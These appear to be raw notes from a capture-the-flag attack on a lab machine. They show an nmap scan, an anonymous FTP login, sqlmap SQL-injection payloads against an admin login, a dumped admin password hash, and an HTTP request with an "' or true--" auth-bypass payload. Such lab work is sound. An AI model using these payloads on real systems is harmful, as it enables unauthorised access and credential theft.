10.10.10.236
ttl 127

[+]NMAP[+]
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
|   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Apache httpd 2.4.38 ((Debian))
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_http-server-header: Apache/2.4.38 (Debian)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: MegaLogistics
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-31T09:29:17
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: -1h59m55s


ftp 10.10.10.236
user = anonymous
pass = 

-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe

[+]SQLI[+]
https://admin.megalogistic.com/

[15:47:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=admin' AND (SELECT (CASE WHEN (2516=2516) THEN NULL ELSE CAST((CHR(81)||CHR(81)||CHR(73)||CHR(109)) AS NUMERIC) END)) IS NULL AND 'IQnM'='IQnM&password=password

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=admin' AND 1418=CAST((CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (1418=1418) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC) AND 'ZMni'='ZMni&password=password


sqlmap -r toolbox.req --dbs
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

sqlmap -r toolbox.req --tables -D public
Database: public
[1 table]
+-------+
| users |
+-------+


sqlmap -r toolbox.req -T users -D public --dump
Database: public
Table: users
[1 entry]
+----------------------------------+----------+
| password                         | username |
+----------------------------------+----------+
| 4a100a85cb5ca3616dcf137918550815 | admin    |
+----------------------------------+----------+


[+]SQLI + INTRUDER[+]

POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=da57e162ec97addea10e741b2ff008b5
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://admin.megalogistic.com
Dnt: 1
Referer: https://admin.megalogistic.com/
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

username='%20or%20true--&password=pass

[+]https://admin.megalogistic.com/dashboard.php[+]
to do: 
Send credentials to Tony
Update Printer Drivers


Developer
MegaCorp 

